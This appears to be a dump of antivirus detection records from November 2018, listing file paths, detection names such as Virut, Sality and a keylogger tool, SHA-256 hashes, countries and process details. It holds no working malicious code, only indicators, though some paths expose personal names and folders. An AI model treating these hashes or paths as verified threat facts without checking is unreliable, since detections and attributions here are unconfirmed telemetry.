  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:51:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:08:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\OneDrive\\文件\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T04:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='17b264bed4b12871fd7d6207a6ff22b68420775629d17e236e1ebbf81733692b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxa6332.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxa6331.tmp\\dxa6332.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001aff', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001aff', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090810-17c6ea0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224821-B9828F66\\AVSCAN-20181102-090810-17C6EA0B', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af65c', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af65c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00091f43', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp00091f43', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180640-a677b91e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42b45b62\\AVSCAN-20181101-180627-A38DC85E\\AVSCAN-20181101-180640-A677B91E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-regraptor.exe', filepath='D:\\Neuer Ordner\\TREIBER\\Downloader-fuer-regraptor.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='19ef9a33cd64e73a74511bff6d5ed9f6e71ef1d12b2a90b0e2380a0b59e5df3f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T21:57:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8396f6400c35a0c89e1e4e96d5323c173eea9a93', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8396f6400c35a0c89e1e4e96d5323c173eea9a93', filesize=2944000, name='TR/Crypt.EPACK.Gen2.#M300.#R100627'), hash='369e82ed6d1929e1e846ac2b2cea485a8434fb4043412bf35559b4840907e760', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-061136-9769ab77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_84779704\\AVSCAN-20181102-055451-45B59CD0\\AVSCAN-20181102-061136-9769AB77', filesize=7012000, name='WORM/Lodbak.Gen4.#M1.#R1'), hash='0e719be3218d3b557e9155cc933efc1598864c4c32ee8843041111009ba43d08', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T06:31:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-084120-944a1e2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8ed2446\\AVSCAN-20181102-083539-58E69A48\\AVSCAN-20181102-084120-944A1E2E', filesize=8000, name='JS/iFrame.EB.12.#M1.#R1'), hash='c3f7d2a027770c187ee6b34dc76f9baa174b123bc1edd0dbc65745de9da61d97', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='htccalc.exe', filepath='C:\\Users\\X\\Desktop\\root\\Neu 2018\\Neuer Ordner1\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:TU7vLLcLokWJxCTA.1', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T18:56:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150046-9538b689', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150046-9538B689', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='\\\\?\\C:\\Program Files\\Common Files\\TTKN\\Bin\\libeay32.dll', filesize=1216000, name='W32/Ramnit.CD.#M1.#R1'), hash='8eb80279e5e95160846621869a01d51797c9f16cd6b5fa8b30390cdcef48f6d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:34:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corso paziente psichiatrico docenti.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\corso paziente psichiatrico docenti.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ut9tl4ek.exe', filepath='C:\\New folder\\برامج مكافحة للفيروسات\\ut9tl4ek.exe', filesize=384000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='a146cfe85e2301113fd71b2c667234a314bd021295f358d9bc414274f40c7928', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:59:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsxCE5C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T16:45:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dw20.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\DW\\DW20.EXE', filesize=880000, name='W32/Sality.AT.#M1.#R1'), hash='999e5a306b24b48622b177c078c18b94e37dddb09a319a2735277cc16db69e49', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0_5_0_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\0_5_0_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='9936446c153f2989de9b0251c76259e28db1a431f243d3d07bc76d6859a8ccc0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T12:54:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='62nkb2wm.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\62nkb2wm.exe', filesize=128000, name='HEUR/AGEN.1035695.#M1.#R1'), hash='87360561a5460d89112d64b3826081504b230c64f9f43eeac66157b4d0c341ed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='C:\\Program Files (x86)\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:34:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152607-b8c7532c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152607-B8C7532C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:26:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093552-9bfde906', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093552-9BFDE906', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e01e15b3b3a622259a0b60b7b4121e4fc92daa30dbb522c5a700cfb7d4cc158f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\E01E15B3B3A622259A0B60B7B4121E4FC92DAA30DBB522C5A700CFB7D4CC158F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e01e15b3b3a622259a0b60b7b4121e4fc92daa30dbb522c5a700cfb7d4cc158f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:12:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c263a89a34bb9ab689b2855f4cd7cae0d954900bb06e395261afd82052bc2161', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\C263A89A34BB9AB689B2855F4CD7CAE0D954900BB06E395261AFD82052BC2161', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c263a89a34bb9ab689b2855f4cd7cae0d954900bb06e395261afd82052bc2161', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kalkisim_nihal.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Kalkisim_Nihal.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='f436181c218f5a59f9002427d1b651f6a667c2da5abb8f43b5639dfb235e41af', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='puhxioxe.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\puHXioxE.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mpstd.exe', filepath='\\\\?\\H:\\12.) DESHA_ITD\\2.) OTHER THINGS\\IERP MANILA\\Drivers\\Audio\\REALTEK\\XP64_MCE_XP_2K_ME_98(A380)\\Ap\\Mpstd.exe', filesize=3904000, name='W32/Viking.AT.#M1.#R1'), hash='ba4887fb618f9175010e02cd0759ded976db393f5f6ef7e84c11476dd9b80603', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-164944-0443f19b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95369046\\AVSCAN-20181104-164332-D4C777B9\\AVSCAN-20181104-164944-0443F19B', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:49:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chllonka.exe', filepath='F:\\RECYCLER_DETEC\\S-3-8-65-8402467574-3770633725-252716346-1347\\CHllONka.exe', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1552384, timestamp='2018-11-04T12:57:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T00:05:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151228-92efdc21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-151228-92EFDC21', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:10:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_251955c7.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_251955c7.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='07230c7d88258b61ea02965a2574b6a4.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_117089226\\07230c7d88258b61ea02965a2574b6a4.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='9c0d0de9adc9d5bcd2cfda936568d7d1f27f2f7bf698b6070a0f67c95f9b25d7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T23:00:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:25:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T19:57:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131929-3c9a906c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131929-3C9A906C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:19:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132254-4c0aeeff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132254-4C0AEEFF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tuppsetup_2005.exe', filepath='C:\\Users\\X\\Downloads\\tuppsetup_2005.exe', filesize=3460000, name='PUA/Systweak.Gen4.#M300.#R300346'), hash='7dc1bbc0972a3b0781c717b718319628892d477edc9a95fbacf7e9e14684f782', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T05:32:30Z'), dt=datetime.date(2018, 11, 4)),
